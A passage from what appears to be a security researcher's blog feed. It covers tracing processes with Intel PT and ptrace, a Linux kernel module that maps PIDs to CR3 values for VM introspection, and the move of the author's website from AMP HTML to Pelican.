<span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">pid</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="mi">0</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"> </span><span class="c1">// Child process</span>
<span class="w"> </span><span class="c1">// Wait for parent to signal that PT is ready</span>
<span class="w"> </span><span class="n">execvp</span><span class="p">(</span><span class="n">target_program</span><span class="p">,</span><span class="w"> </span><span class="n">args</span><span class="p">);</span>
<span class="p">}</span><span class="w"> </span><span class="k">else</span><span class="w"> </span><span class="p">{</span><span class="w"> </span><span class="c1">// Parent process</span>
<span class="w"> </span><span class="n">enable_cr3_filter</span><span class="p">(</span><span class="n">pid</span><span class="p">);</span>
<span class="w"> </span><span class="n">enable_pt</span><span class="p">();</span>
<span class="w"> </span><span class="c1">// Signal child that PT is ready</span>
<span class="p">}</span>
</code></pre></div>
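<p>For readers who want to try the pattern themselves, here is a runnable version of the same fork-and-wait handshake. The parent's PT setup is abstracted into a caller-supplied hook (<code>prepare</code>, a hypothetical name standing in for <code>enable_cr3_filter()</code> and <code>enable_pt()</code>), and a pipe serves as the "PT is ready" signal. It reproduces only the structure of the first attempt and does nothing about the problem described in the next section.</p>

```c
#include <stddef.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Hypothetical hook for the parent's tracing setup; in the pseudocode this
   is where enable_cr3_filter(pid) and enable_pt() would be called. */
typedef void (*prepare_fn)(pid_t child);

/* Forks a child that blocks on a pipe until `prepare` has run in the parent,
   then execvp()s the target. Returns the child's exit status, or -1. */
int launch_traced(const char *file, char *const argv[], prepare_fn prepare) {
    int ready[2];
    if (pipe(ready) == -1)
        return -1;

    pid_t pid = fork();
    if (pid == -1) {
        close(ready[0]);
        close(ready[1]);
        return -1;
    }

    if (pid == 0) {                          /* child */
        char go;
        close(ready[1]);
        if (read(ready[0], &go, 1) != 1)     /* wait for "PT is ready" */
            _exit(127);
        close(ready[0]);
        execvp(file, argv);
        _exit(127);                          /* reached only if execvp fails */
    }

    close(ready[0]);                         /* parent */
    if (prepare != NULL)
        prepare(pid);
    ssize_t sent = write(ready[1], "g", 1);  /* signal the child */
    close(ready[1]);  /* if the write failed, the child sees EOF and exits */

    int status;
    if (waitpid(pid, &status, 0) == -1 || sent != 1)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}
```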
<p>Easy enough, right? I compiled the program, ran my first trace and got...
nothing.</p>
<h2>execvp and CR3</h2>
<p>So what went wrong? It turns out we can demonstrate the problem with a simple
test. Consider this small C program:</p>
<div class="highlight"><pre><span></span><code><span class="c1">// test_1.c</span>
<span class="cp">#include</span><span class="w"> </span><span class="cpf"><stdio.h></span>
<span class="cp">#include</span><span class="w"> </span><span class="cpf"><unistd.h></span>
<span class="kt">void</span><span class="w"> </span><span class="nf">pid_to_cr3</span><span class="p">()</span><span class="w"> </span><span class="p">{</span>
<span class="w"> </span><span class="kt">int</span><span class="w"> </span><span class="n">m_pid</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">getpid</span><span class="p">();</span>
<span class="w"> </span><span class="kt">char</span><span class="w"> </span><span class="n">pid_str</span><span class="p">[</span><span class="mi">20</span><span class="p">];</span>
<span class="w"> </span><span class="n">snprintf</span><span class="p">(</span><span class="n">pid_str</span><span class="p">,</span><span class="w"> </span><span class="mi">20</span><span class="p">,</span><span class="w"> </span><span class="s">"%d"</span><span class="p">,</span><span class="w"> </span><span class="n">m_pid</span><span class="p">);</span>
<span class="w"> </span><span class="kt">FILE</span><span class="w"> </span><span class="o">*</span><span class="w"> </span><span class="n">chardev</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">fopen</span><span class="p">(</span><span class="s">"/dev/pid_to_cr3"</span><span class="p">,</span><span class="w"> </span><span class="s">"w"</span><span class="p">);</span>
<span class="w"> </span><span class="n">fputs</span><span class="p">(</span><span class="n">pid_str</span><span class="p">,</span><span class="w"> </span><span class="n">chardev</span><span class="p">);</span>
<span class="w"> </span><span class="n">fclose</span><span class="p">(</span><span class="n">chardev</span><span class="p">);</span>
<span class="p">}</span>
<span class="kt">void</span><span class="w"> </span><span class="nf">main</span><span class="p">()</span><span class="w"> </span><span class="p">{</span>
<span class="w"> </span><span class="kt">char</span><span class="w"> </span><span class="o">*</span><span class="n">argv</span><span class="p">[]</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="p">{</span><span class="s">"./test_2"</span><span class="p">,</span><span class="w"> </span><span class="nb">NULL</span><span class="p">};</span>
<span class="w"> </span><span class="kt">int</span><span class="w"> </span><span class="n">pid</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">fork</span><span class="p">();</span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">pid</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="mi">0</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"> </span><span class="c1">// Child process</span>
<span class="w"> </span><span class="n">pid_to_cr3</span><span class="p">();</span><span class="w"> </span><span class="c1">// printed to dmesg</span>
<span class="w"> </span><span class="n">execvp</span><span class="p">(</span><span class="n">argv</span><span class="p">[</span><span class="mi">0</span><span class="p">],</span><span class="w"> </span><span class="n">argv</span><span class="p">);</span>
<span class="w"> </span><span class="p">}</span>
<span class="p">}</span>
</code></pre></div>
<p>In this example, <code>/dev/pid_to_cr3</code> is a simple Linux character device:
a process writes a PID into it, and the driver prints the corresponding CR3 value
to the kernel log. Its core is this lookup function:</p>
<div class="highlight"><pre><span></span><code><span class="c1">// pid_to_cr3.c</span>
<span class="k">static</span><span class="w"> </span><span class="kt">unsigned</span><span class="w"> </span><span class="kt">long</span><span class="w"> </span><span class="nf">pid_to_cr3</span><span class="p">(</span><span class="kt">int</span><span class="w"> </span><span class="n">pid</span><span class="p">)</span><span class="w"> </span><span class="p">{</span>
<span class="w"> </span><span class="k">struct</span><span class="w"> </span><span class="nc">task_struct</span><span class="w"> </span><span class="o">*</span><span class="n">task</span><span class="p">;</span>
<span class="w"> </span><span class="k">struct</span><span class="w"> </span><span class="nc">mm_struct</span><span class="w"> </span><span class="o">*</span><span class="n">mm</span><span class="p">;</span>
<span class="w"> </span><span class="kt">void</span><span class="w"> </span><span class="o">*</span><span class="n">cr3_virt</span><span class="p">;</span>
<span class="w"> </span><span class="n">task</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">pid_task</span><span class="p">(</span><span class="n">find_vpid</span><span class="p">(</span><span class="n">pid</span><span class="p">),</span><span class="w"> </span><span class="n">PIDTYPE_PID</span><span class="p">);</span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">((</span><span class="kt">uintptr_t</span><span class="p">)</span><span class="w"> </span><span class="n">task</span><span class="w"> </span><span class="o"><</span><span class="w"> </span><span class="mi">1</span><span class="p">)</span>
<span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="mi">0</span><span class="p">;</span>
<span class="w"> </span><span class="n">mm</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">task</span><span class="o">-></span><span class="n">mm</span><span class="p">;</span>
<span class="w"> </span><span class="c1">// mm can be NULL in cases such as kthreads, in which case we want the active_mm</span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">mm</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="nb">NULL</span><span class="p">)</span>
<span class="w"> </span><span class="n">mm</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">task</span><span class="o">-></span><span class="n">active_mm</span><span class="p">;</span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">mm</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="nb">NULL</span><span class="p">)</span>
<span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="mi">0</span><span class="p">;</span>
<span class="w"> </span><span class="n">cr3_virt</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="p">(</span><span class="kt">void</span><span class="w"> </span><span class="o">*</span><span class="p">)</span><span class="w"> </span><span class="n">mm</span><span class="o">-></span><span class="n">pgd</span><span class="p">;</span>
<span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="n">virt_to_phys</span><span class="p">(</span><span class="n">cr3_virt</span><span class="p">);</span>
<span class="p">}</span>
</code></pre></div>
<p>After <code>test_1</code> writes its PID to <code>/dev/pid_to_cr3</code>, the child uses <code>execvp</code> to
replace its memory image with a new program, <code>test_2</code> (built from <code>test_2.c</code>). This program
simply writes its own PID to <code>/dev/pid_to_cr3</code> as well:</p>
<div class="highlight"><pre><span></span><code><span class="cp">#include</span><span class="w"> </span><span class="cpf"><stdio.h></span>
<span class="cp">#include</span><span class="w"> </span><span class="cpf"><unistd.h></span>
<span class="kt">void</span><span class="w"> </span><span class="nf">pid_to_cr3</span><span class="p">()</span><span class="w"> </span><span class="p">{</span>
<span class="w"> </span><span class="kt">int</span><span class="w"> </span><span class="n">m_pid</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">getpid</span><span class="p">();</span>
<span class="w"> </span><span class="kt">char</span><span class="w"> </span><span class="n">pid_str</span><span class="p">[</span><span class="mi">20</span><span class="p">];</span>
<span class="w"> </span><span class="n">snprintf</span><span class="p">(</span><span class="n">pid_str</span><span class="p">,</span><span class="w"> </span><span class="mi">20</span><span class="p">,</span><span class="w"> </span><span class="s">"%d"</span><span class="p">,</span><span class="w"> </span><span class="n">m_pid</span><span class="p">);</span>
<span class="w"> </span><span class="kt">FILE</span><span class="w"> </span><span class="o">*</span><span class="w"> </span><span class="n">chardev</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">fopen</span><span class="p">(</span><span class="s">"/dev/pid_to_cr3"</span><span class="p">,</span><span class="w"> </span><span class="s">"w"</span><span class="p">);</span>
<span class="w"> </span><span class="n">fputs</span><span class="p">(</span><span class="n">pid_str</span><span class="p">,</span><span class="w"> </span><span class="n">chardev</span><span class="p">);</span>
<span class="w"> </span><span class="n">fclose</span><span class="p">(</span><span class="n">chardev</span><span class="p">);</span>
<span class="p">}</span>
<span class="kt">void</span><span class="w"> </span><span class="nf">main</span><span class="p">()</span><span class="w"> </span><span class="p">{</span>
<span class="w"> </span><span class="n">pid_to_cr3</span><span class="p">();</span><span class="w"> </span><span class="c1">// printed to dmesg</span>
<span class="p">}</span>
</code></pre></div>
<p>If we compile these source files and run <code>test_1</code>, we expect the PID to be
the same before and after the <code>execvp</code> call, because <code>execvp</code> replaces the program
image of the calling process instead of creating a new process. But what happens
to the CR3 value? As it turns out:</p>
<div class="highlight"><pre><span></span><code>[ 1757.437572] PID 17319 = CR3 18759503872
[ 1757.438414] PID 17319 = CR3 18826612736
</code></pre></div>
<p>Rather than rewriting the caller's existing page table when <code>execvp</code> is called,
the Linux kernel allocates and populates an entirely new page table!
Since our original PT program read the CR3 value <em>before</em> the <code>execvp</code>, its CR3
filter matched the old, discarded page table, and the trace never included the
target program's execution.</p>
<h2>ptrace</h2>
<p>So how do we get the CR3 value <em>after</em> <code>execvp</code> is called by the child? We can't
simply reuse the handshake from the first attempt, because any code we give to the
child process is overwritten when <code>execvp</code> is called, so the child has no way to
tell the parent that the exec has finished. The solution instead lies in an OS
feature known as <code>ptrace</code>. Using <code>PTRACE_TRACEME</code>, the child process can ask to be
traced by its parent. When <code>execvp</code> completes, the kernel sends the child a <code>SIGTRAP</code>,
which stops it and notifies the parent. The parent can catch this stop using
<code>waitpid()</code>, do whatever it needs to do, and then resume the child. The code looks
something like this:</p>
<div class="highlight"><pre><span></span><code><span class="n">pid</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">fork</span><span class="p">()</span>
<span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">pid</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="mi">0</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"> </span><span class="c1">// Child process</span>
<span class="w"> </span><span class="n">ptrace</span><span class="p">(</span><span class="n">PTRACE_TRACEME</span><span class="p">,</span><span class="w"> </span><span class="mi">0</span><span class="p">,</span><span class="w"> </span><span class="nb">NULL</span><span class="p">,</span><span class="w"> </span><span class="nb">NULL</span><span class="p">);</span>
<span class="w"> </span><span class="n">execvp</span><span class="p">(</span><span class="n">args</span><span class="p">[</span><span class="mi">0</span><span class="p">],</span><span class="w"> </span><span class="n">args</span><span class="p">);</span>
<span class="p">}</span><span class="w"> </span><span class="k">else</span><span class="w"> </span><span class="p">{</span><span class="w"> </span><span class="c1">// Parent process</span>
<span class="w"> </span><span class="n">waitpid</span><span class="p">(</span><span class="n">pid</span><span class="p">,</span><span class="w"> </span><span class="nb">NULL</span><span class="p">,</span><span class="w"> </span><span class="mi">0</span><span class="p">);</span><span class="w"> </span><span class="c1">// Wait for child to complete execvp()</span>
<span class="w"> </span><span class="n">enable_cr3_filter</span><span class="p">(</span><span class="n">pid</span><span class="p">);</span>
<span class="w"> </span><span class="n">enable_pt</span><span class="p">();</span>
<span class="w"> </span><span class="n">ptrace</span><span class="p">(</span><span class="n">PTRACE_DETACH</span><span class="p">,</span><span class="w"> </span><span class="n">pid</span><span class="p">,</span><span class="w"> </span><span class="mi">0</span><span class="p">,</span><span class="w"> </span><span class="mi">0</span><span class="p">);</span><span class="w"> </span><span class="c1">// Resume child</span>
<span class="p">}</span>
</code></pre></div>
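<p>Note that this code detaches the parent from the child once the child has
stopped, which lets the child resume normal execution. If we wanted to keep
monitoring the child (for example, to detect <code>fork()</code> or <code>clone()</code>), we could stay
attached instead, set options such as <code>PTRACE_O_TRACEFORK</code> and <code>PTRACE_O_TRACECLONE</code>
with <code>PTRACE_SETOPTIONS</code>, and resume the child with <code>PTRACE_CONT</code>.</p>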
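<p>To try the launch pattern above outside of a PT setup, here is a minimal runnable sketch in C. It assumes Linux and glibc, and <code>on_exec_stop()</code> and <code>launch_traced()</code> are hypothetical names: <code>on_exec_stop()</code> is only a placeholder for the <code>enable_cr3_filter()</code>/<code>enable_pt()</code> steps, which are not shown. Unlike the pseudocode, it checks that the first stop really is the post-exec <code>SIGTRAP</code>, exits the child with status 127 if <code>execvp</code> fails, and reaps the child after detaching.</p>

```c
#define _GNU_SOURCE
#include <assert.h>
#include <signal.h>
#include <stdio.h>
#include <sys/ptrace.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Hypothetical hook: a real tracer would call enable_cr3_filter(pid) and
 * enable_pt() here, now that the child's post-exec CR3 is in place. */
static void on_exec_stop(pid_t pid)
{
    fprintf(stderr, "child %d stopped after execvp; arm tracing here\n", (int)pid);
}

/* Run argv[0] with arguments argv, pausing once right after execvp succeeds.
 * Returns the child's exit status, or -1 on error or abnormal termination. */
int launch_traced(char *const argv[])
{
    assert(argv != NULL && argv[0] != NULL);

    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {                                   /* child */
        if (ptrace(PTRACE_TRACEME, 0, NULL, NULL) == -1)
            _exit(127);
        execvp(argv[0], argv);                        /* success => SIGTRAP stop */
        _exit(127);                                   /* only reached if execvp failed */
    }

    int status;
    if (waitpid(pid, &status, 0) != pid)
        return -1;
    if (WIFEXITED(status))                            /* child exited before exec completed */
        return WEXITSTATUS(status);
    if (WIFSIGNALED(status))
        return -1;
    if (WSTOPSIG(status) != SIGTRAP) {                /* stopped, but not the post-exec stop */
        kill(pid, SIGKILL);
        waitpid(pid, NULL, 0);
        return -1;
    }

    on_exec_stop(pid);

    /* Detach without injecting a signal; the child continues normally. */
    if (ptrace(PTRACE_DETACH, pid, NULL, NULL) == -1)
        return -1;
    if (waitpid(pid, &status, 0) != pid)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}
```

<p>For example, <code>launch_traced((char *[]){"ls", "-l", NULL})</code> runs <code>ls -l</code> with a single pause right after the exec. Detaching keeps the sketch short; following later <code>fork()</code> or <code>clone()</code> calls would require staying attached.</p>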
<p>Making the above modification allows the parent to capture the correct CR3 value
and get a complete PT trace.</p>Of Fancy Bears and Men: Attribution in Cybersecurity2017-03-09T22:30:00-05:002017-03-09T22:30:00-05:00Carter Yagemanntag:carteryagemann.com,2017-03-09:/of-fancy-bears-and-men.html<p>I wrote a guest blog post for Georgia Tech's Internet Governance Project (IGP)
on the topic of attack attribution. You can read the post here:
<a href="http://www.internetgovernance.org/2017/03/09/of-fancy-bears-and-men-attribution-in-cybersecurity/">http://www.internetgovernance.org/2017/03/09/of-fancy-bears-and-men-attribution-in-cybersecurity/</a></p>Getting the CR3 value for a PID in Linux2017-01-30T20:30:00-05:002017-01-30T20:30:00-05:00Carter Yagemanntag:carteryagemann.com,2017-01-30:/pid-to-cr3.html<p>Writing low level code can be difficult due to the lack of examples on the internet.
The answer is generally sitting somewhere in a 3,000-page manual where only the most dedicated programmers will find it.</p>
<p>Last week I had such an experience. Currently my research involves a lot of x86-specific programming and virtual machine introspection (VMI).
To test one of the proof-of-concept hypervisors I'm working on, I needed a way to quickly convert Linux PID values into the corresponding
value that gets loaded into the CR3 register when that process is executing on the CPU. For those who are unfamiliar with the x86 CPU architecture,
I recommend reading <a href="https://www.kernel.org/doc/gorman/html/understand/understand006.html">this page</a> on Linux x86 page table management.
The short version is that when a process runs on an x86 CPU, the CR3 register is loaded with the <em>physical</em> address of that process's
<em>page global directory</em> (PGD).
This is necessary so the CPU can translate virtual memory addresses into physical memory addresses.
Since every process needs its own PGD, the value in the CR3 register will be unique for each scheduled process in the system.
This is very convenient for VMI because it means we don't need to constantly scan the guest kernel's memory to keep track of which process is
being executed. Instead, we can just monitor writes to the CR3 register.</p>
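<p>One practical detail when monitoring CR3 writes: on x86-64 with 4-level paging, the register holds more than the PGD address. Bits 51:12 carry the page-aligned physical base of the top-level table (Linux's PGD, Intel's PML4), while the low 12 bits hold either the PWT/PCD cache-control flags or, when PCIDs are enabled, a process-context identifier. The sketch below strips those bits before comparing an observed CR3 against a PGD physical address. The names <code>CR3_PGD_MASK</code>, <code>cr3_pgd_base()</code>, and <code>cr3_matches_pgd()</code> are my own, and the sketch assumes 4-level paging with a physical address width of at most 52 bits.</p>

```c
#include <assert.h>
#include <stdbool.h>
#include <stdint.h>

/* Bits 51:12 of CR3 hold the physical base address of the top-level page
 * table under x86-64 4-level paging. */
#define CR3_PGD_MASK 0x000FFFFFFFFFF000ULL

/* Drop flag/PCID bits (11:0) and any high bits (63:52) from a raw CR3 value. */
static inline uint64_t cr3_pgd_base(uint64_t cr3)
{
    return cr3 & CR3_PGD_MASK;
}

/* True if a raw CR3 value observed by the hypervisor points at the PGD whose
 * physical address was reported for a process (e.g. virt_to_phys(mm->pgd)). */
static inline bool cr3_matches_pgd(uint64_t cr3, uint64_t pgd_phys)
{
    assert((pgd_phys & 0xFFFULL) == 0);  /* x86-64 PGDs are page-aligned */
    return cr3_pgd_base(cr3) == pgd_phys;
}
```

<p>For example, <code>cr3_matches_pgd(0x45E275018, 0x45E275000)</code> is true: the extra <code>0x018</code> in the observed value is only the PWT/PCD flags.</p>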
<p>However, just tracking changes to the CR3 register doesn't give us much insight into what the guest kernel is doing.
This is commonly referred to as the <em>semantic gap</em> problem. In order to cross this gap, we need to map the PID values of the processes we're interested
in to their corresponding CR3 values. The following Linux kernel module code snippet does just that:</p>
<div class="highlight"><pre><span></span><code><span class="cp">#include</span><span class="w"> </span><span class="cpf"><linux/module.h></span>
<span class="cp">#include</span><span class="w"> </span><span class="cpf"><linux/kernel.h></span>
<span class="cp">#include</span><span class="w"> </span><span class="cpf"><linux/sched.h></span>
<span class="cp">#include</span><span class="w"> </span><span class="cpf"><linux/pid.h></span>
<span class="cp">#include</span><span class="w"> </span><span class="cpf"><asm/io.h></span>
<span class="kt">unsigned</span><span class="w"> </span><span class="kt">long</span><span class="w"> </span><span class="nf">pid_to_cr3</span><span class="p">(</span><span class="kt">int</span><span class="w"> </span><span class="n">pid</span><span class="p">)</span>
<span class="p">{</span>
<span class="w"> </span><span class="k">struct</span><span class="w"> </span><span class="nc">task_struct</span><span class="w"> </span><span class="o">*</span><span class="n">task</span><span class="p">;</span>
<span class="w"> </span><span class="k">struct</span><span class="w"> </span><span class="nc">mm_struct</span><span class="w"> </span><span class="o">*</span><span class="n">mm</span><span class="p">;</span>
<span class="w"> </span><span class="kt">void</span><span class="w"> </span><span class="o">*</span><span class="n">cr3_virt</span><span class="p">;</span>
<span class="w"> </span><span class="kt">unsigned</span><span class="w"> </span><span class="kt">long</span><span class="w"> </span><span class="n">cr3_phys</span><span class="p">;</span>
<span class="w"> </span><span class="n">task</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">pid_task</span><span class="p">(</span><span class="n">find_vpid</span><span class="p">(</span><span class="n">pid</span><span class="p">),</span><span class="w"> </span><span class="n">PIDTYPE_PID</span><span class="p">);</span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">task</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="nb">NULL</span><span class="p">)</span>
<span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="mi">0</span><span class="p">;</span><span class="w"> </span><span class="c1">// pid has no task_struct</span>
<span class="w"> </span><span class="n">mm</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">task</span><span class="o">-></span><span class="n">mm</span><span class="p">;</span>
<span class="w"> </span><span class="c1">// mm can be NULL in some rare cases (e.g. kthreads)</span>
<span class="w"> </span><span class="c1">// when this happens, we should check active_mm</span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">mm</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="nb">NULL</span><span class="p">)</span><span class="w"> </span><span class="p">{</span>
<span class="w"> </span><span class="n">mm</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">task</span><span class="o">-></span><span class="n">active_mm</span><span class="p">;</span>
<span class="w"> </span><span class="p">}</span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">mm</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="nb">NULL</span><span class="p">)</span>
<span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="mi">0</span><span class="p">;</span><span class="w"> </span><span class="c1">// this shouldn't happen, but just in case</span>
<span class="w"> </span><span class="n">cr3_virt</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="p">(</span><span class="kt">void</span><span class="w"> </span><span class="o">*</span><span class="p">)</span><span class="w"> </span><span class="n">mm</span><span class="o">-></span><span class="n">pgd</span><span class="p">;</span>
<span class="w"> </span><span class="n">cr3_phys</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">virt_to_phys</span><span class="p">(</span><span class="n">cr3_virt</span><span class="p">);</span>
<span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="n">cr3_phys</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div>
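<p>On the introspection side, the PID-to-CR3 pairs produced by a helper like this still have to be consulted whenever the hypervisor traps a CR3 write. The sketch below is a hypothetical, deliberately simple fixed-size table (<code>cr3_table</code>, <code>cr3_table_set()</code>, and <code>cr3_table_lookup()</code> are invented for illustration) that maps an observed CR3 back to a PID. It assumes the observed values have already had any flag bits cleared. A linear scan is fine for a handful of processes of interest; a hash table would be the natural upgrade for many. The update path matters because a process keeps its PID but receives a new CR3 when it calls <code>execvp</code>.</p>

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

#define CR3_TABLE_MAX 64  /* arbitrary capacity for this sketch */

struct cr3_entry {
    int pid;
    uint64_t cr3;         /* physical PGD address, as returned by pid_to_cr3() */
};

struct cr3_table {
    struct cr3_entry entries[CR3_TABLE_MAX];
    size_t count;
};

/* Insert or update the CR3 recorded for pid. Returns 0, or -1 if full. */
int cr3_table_set(struct cr3_table *t, int pid, uint64_t cr3)
{
    assert(t != NULL);
    for (size_t i = 0; i < t->count; i++) {
        if (t->entries[i].pid == pid) {
            t->entries[i].cr3 = cr3;   /* e.g. the process called execvp */
            return 0;
        }
    }
    if (t->count == CR3_TABLE_MAX)
        return -1;
    t->entries[t->count++] = (struct cr3_entry){ .pid = pid, .cr3 = cr3 };
    return 0;
}

/* Map a CR3 value seen on a trapped CR3 write back to a PID, or -1. */
int cr3_table_lookup(const struct cr3_table *t, uint64_t cr3)
{
    assert(t != NULL);
    for (size_t i = 0; i < t->count; i++)
        if (t->entries[i].cr3 == cr3)
            return t->entries[i].pid;
    return -1;
}
```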
<p>It should be noted that while the CR3 register is useful for tracking which <em>process</em> is being executed, it cannot track which <em>thread</em> is executing
because threads of the same process share one address space and therefore have the same PGD and CR3 value. Keeping track of the scheduling of threads via introspection is
a more complicated task and a topic for another time.</p>
<p>For simplicity, I implemented the conversion code as a Linux kernel module. If you're interested in how to do this conversion using pure introspection
on an unmodified kernel, you should check out <a href="https://github.com/libvmi/libvmi/blob/master/libvmi/os/linux/memory.c#L145">libVMI's code</a>.</p>Site Redesign2017-01-24T19:20:00-05:002017-01-24T19:20:00-05:00Carter Yagemanntag:carteryagemann.com,2017-01-24:/move-to-pelican.html<h2>HTML5Up</h2>
<p>When I originally registered the domain carteryagemann.com, I imagined it would be a single static page summarizing my professional career: an eye-catcher for recruiters
and peers searching for my name on the internet. I wanted a place for bragging that I would have complete control over, not restricted by the cookie-cutter molds set by
social networking sites. A few months later, I was asked to write blog articles for Syracuse University's engineering college, and suddenly my website was no longer a single
page. As much as I liked my <a href="https://html5up.net/">HTML5Up</a> design, I needed new templates. I also have to admit that the JavaScript my site originally used was slow at
times.</p>
<h2>AMP HTML</h2>
<p>I always liked the idea of fast and efficient web pages, especially when those web pages are being served at my expense. I wanted to stay with static pages for two main
reasons. First, static pages are cheaper and easier to host and cache. Second, static pages pose little attack surface. The last thing I wanted as a security professional
was for a site with my name on it to get compromised because I only look at it twice a year.</p>
<p>I was browsing around for platforms to build my new site on when I heard about this thing Google was working on called <a href="https://www.ampproject.org/learn/about-amp/">AMP HTML</a>.
What drew me in was their promise of a fast user experience and a specification designed for being cached. Google was going to cache and prioritize search results for AMP
HTML pages and even social networks like <a href="https://www.ampproject.org/learn/about-amp/">Twitter</a> announced plans to implement AMP HTML caching servers. All this meant free
bandwidth and geographically distributed caching for my humble site. Perfect.</p>
<p>Sadly, about a year after I reworked my entire site to run on AMP HTML (I had even visually designed it based on
<a href="https://material.io/guidelines/material-design/introduction.html">Material Design</a>), I realized my decision was not the best. More accurately, my work in security brought
me into contact with more privacy-minded people and over time I came to adopt their mindset. I stopped seeing AMP HTML as an open source project and became hung up on the
company that sat behind it. A company that over the years has pushed a narrative in cyberspace aimed at destroying privacy with promises of convenience while hiding its
true goal of making money by knowing as much about people as legally (not ethically) possible. As the now famous saying goes:</p>
<blockquote>
<p>If you're not paying for it, you're the product.</p>
</blockquote>
<p>There were also three other reasons for my dissatisfaction with AMP HTML:</p>
<h3>Mandatory JavaScript</h3>
<p>As someone who values security and privacy, I try my best to make websites that are functional even when the user disables active content (JavaScript, Flash, etc.).
If a site wants to use JavaScript to make some parts prettier (e.g. syntax highlighting code) or save bandwidth (e.g. AJAX), that's fine. On the other hand, I find it very
rude and unethical when a site won't even display a single image or line of text until the user executes JavaScript from 30+ sources (news sites are particularly notorious
for this). JavaScript is code, code can be malicious or invasive (e.g. JavaScript exploit kits for installing ransomware), and just like how I wouldn't hand someone I just
met a self-signed Windows executable and ask them to run it, a user shouldn't be forced to execute JavaScript upfront just to see what the site is about. This is even more
true when that JavaScript is heavily compressed and obfuscated.</p>
<h3>In-line CSS</h3>
<p>In order for AMP pages to be easily cached, the specification requires that all CSS be embedded directly in the HTML. This quickly becomes a problem when you have multiple
web pages and you want to adjust your site's theme. Writing all the pages by hand turned out to be a major mistake that led to inconsistent formatting and unnecessary
work.</p>
<h3>Public Opinion</h3>
<p>People, especially those with a technical background, are becoming more conscious of the importance of privacy and security and more wary of the power wielded by major tech
companies. Even the tech enthusiasts that buy into the mantra of "nothing to hide" have become more cautious of walled gardens that try to lock the user in. The result is
<a href="https://tech.slashdot.org/story/17/01/18/1455259/the-problem-with-google-amp">negativity towards the AMP HTML platform</a>.</p>
<p>Additionally, as the AMP HTML specification evolves, people both on the <a href="https://stackoverflow.com/questions/41823700/amp-cache-not-getting-removed">technical</a> and
<a href="http://searchengineland.com/google-amp-display-publishers-urls-265945">nontechnical</a> sides are becoming confused.</p>
<p>In response to all these points, I decided it was time to move to a different platform for managing my website.</p>
<h2>Pelican</h2>
<p>For my new site I still wanted static pages for their cheap hosting, easy caching, and security, but I also wanted a way to be able to write my content in a high level
language and have a program automate compilation and deployment. This isn't a new idea by any stretch, so I knew there had to be good tools readily available. After
looking at what the blogs I read were using and hearing a few recommendations, I decided to go with <a href="https://blog.getpelican.com/">Pelican</a>. For those of you who want to
statically host blogs, I highly recommend it. The learning curve is manageable and the tools are very comfortable for technical people who already prefer command lines.
Pages and articles can be written in <a href="https://en.wikipedia.org/wiki/Markdown">Markdown</a>, which should be familiar to anyone who stores code in git repositories.
There are also plenty of free and publicly available <a href="http://www.pelicanthemes.com/">themes</a>, including the one I'm using for the site
<a href="https://github.com/nairobilug/pelican-alchemy/">right now</a>. I'll stop there before I start to sound like a salesman.</p>
<p>However, while I'm on the topic of plugging software I like, I will also give a quick mention to <a href="https://wummel.github.io/linkchecker/">linkchecker</a>, which I used to find
and fix a few links in my past articles to external sites that no longer exist.</p>
<p>So there you have it. The site now runs on Pelican, I like it very much, and hopefully the considerations I listed here will give you ideas to think about.</p>The Problem with DRM2016-10-22T22:30:00-04:002016-10-22T22:30:00-04:00Carter Yagemanntag:carteryagemann.com,2016-10-22:/drm-problem.html<h2>Preamble</h2>
